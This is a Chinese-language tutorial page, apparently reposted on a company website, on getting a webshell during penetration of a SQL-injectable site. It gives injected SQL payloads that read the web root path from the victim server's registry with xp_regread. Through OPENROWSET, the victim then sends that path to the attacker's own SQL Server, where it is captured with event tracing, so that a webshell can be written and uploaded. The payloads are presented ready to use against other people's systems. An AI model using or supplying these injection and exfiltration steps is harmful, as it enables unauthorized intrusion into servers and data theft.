0514-86177077

9:00-17:00(工作日)

主页 > 知识库 > 渗透中用openrowset搞shell的方法

渗透中用openrowset搞shell的方法
热门标签:临沧移动外呼系统哪家有 宁夏保险智能外呼系统哪家好 温岭代理外呼系统 防城港市ai电销机器人 怎么更改地图标注电话 交行外呼系统有哪些 激战黄昏地图标注说明 不同的地图标注 随州销售外呼系统平台
渗透中用openrowset搞shell的方法 
得到SQL注入点,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了.
联想到一个权限不是很高的命令openrowset,进行跨库服务器查询,就是把一个SQL命令发送到远程数据库,然后看返回的结果,但是要启动事件跟踪!我们可以把网站信息写入数据库,然后%$^%$@#$@^%$~
首先在自己机器建立SQL数据库 

然后在对方机器上建立个表 create table [dbo].[fenggou]([cha8][char](255))--

在对方执行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('select a.* FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密码'', ''select * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--

这样fenggou这个表里就会有这样一条记录select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

不用说,''D:\WEB"就是从注册表里读出的物理路径拉.然后执行DECLARE @a1 char(255) set @a1=(select cha8 FROM fenggou) exec (@a1);--

等于执行了select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

OK,这时你在你机器上SQL事件追踪器上就会显示select * FROM pubs.dbo.authors where au_fname='D:\WEB,,1' 
哇 哈哈哈哈哈 物理路径到手了 写小马传大马吧~ 

标签:红河 阜阳 哈密 忻州 无锡 青海 河源 沈阳

巨人网络通讯声明:本文标题《渗透中用openrowset搞shell的方法》,本文关键词  渗透,中用,openrowset,搞,shell,;如发现本文内容存在版权问题,烦请提供相关信息告之我们,我们将及时沟通与处理。本站内容系统采集于网络,涉及言论、版权与本站无关。
  • 相关文章
  • 下面列出与本文章《渗透中用openrowset搞shell的方法》相关的同类信息!
  • 本页收集关于渗透中用openrowset搞shell的方法的相关信息资讯供网民参考!
    • 推荐文章

    上一篇:最详细的SQL注入相关的命令整理 (转)第1/2页

    下一篇:提升(web)权限终极9技巧

    Copyright © 1999-2012 诚信 合法 规范的巨人网络通讯始建于2005年

    苏ICP备15040257号-8

    产品关键词: 渗透中用openrowset搞shell的方法 渗透,中用,openrowset,搞,shell,